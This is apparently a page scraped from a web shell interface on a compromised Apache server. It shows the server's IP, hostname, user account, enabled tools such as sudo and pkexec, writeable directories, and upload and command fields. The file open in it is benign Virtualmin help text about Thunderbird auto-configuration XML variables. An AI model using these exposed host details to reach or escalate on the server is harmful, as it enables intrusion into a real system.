Private
Server IP : 195.201.23.43  /  Your IP : 18.219.89.186
Web Server : Apache
System : Linux webserver2.vercom.be 5.4.0-192-generic #212-Ubuntu SMP Fri Jul 5 09:47:39 UTC 2024 x86_64
User : kdecoratie ( 1041)
PHP Version : 7.1.33-63+ubuntu20.04.1+deb.sury.org+1
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/webmin/virtual-server/help/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /usr/share/webmin/virtual-server/help/template_autoconfig.html
<header>Thunderbird auto-configuration XML</header>

This field allows you to customize the XML that is returned to mail clients
that access the URL path <tt>/mail/config-v1.1.xml?emailaddress=user@example.com</tt> on a domain using this template. Clients like Thunderbird can use this
XML to automatically configure the mail server hostname, login, port, protocol
and username, based on the email address. <p>

The default XML generated by Virtualmin will work fine in most cases, but in
some situations you want to change the IMAP or SMTP server names, or other
settings. In the template, you can use standard substitutions like
<tt>${DOM}</tt> and <tt>${IP}</tt>, which will be replaced by the domain's
name and IP address when used. <p>

Other variables that can be used in the XML are :

<ul>
<li><b>$SMTP_DOMAIN</b> - The domain name, like example.com
<li><b>$IMAP_HOST</b> - Default IMAP server name, like mail.example.com
<li><b>$IMAP_PORT</b> - Automatically determined IMAP server port (like 143) taken from the IMAP server configuration
<li><b>$IMAP_TYPE</b> - Either <tt>SSL</tt> or <tt>plain</tt>, depending on your IMAP server configuration
<li><b>$IMAP_ENC</b> - Either <tt>password-cleartext</tt> or <tt>password-encrypted</tt>, depending on the IMAP server config.
<li><b>$SMTP_LOGIN</b> - Full username to login to the IMAP and SMTP servers, like <tt>bob.example</tt>
<li><b>$SMTP_HOST</b> - Default SMTP server name, like mail.example.com
<li><b>$SMTP_PORT</b> - Automatically determined SMTP server port (like 587) taken from the mail server configuration
<li><b>$SMTP_TYPE</b> - Either <tt>SSL</tt> or <tt>plain</tt>, depending on your mail server configuration
<li><b>$SMTP_ENC</b> - Either <tt>password-cleartext</tt> or <tt>STARTTLS</tt>, depending on the mail server config.
</ul>

<footer>
Private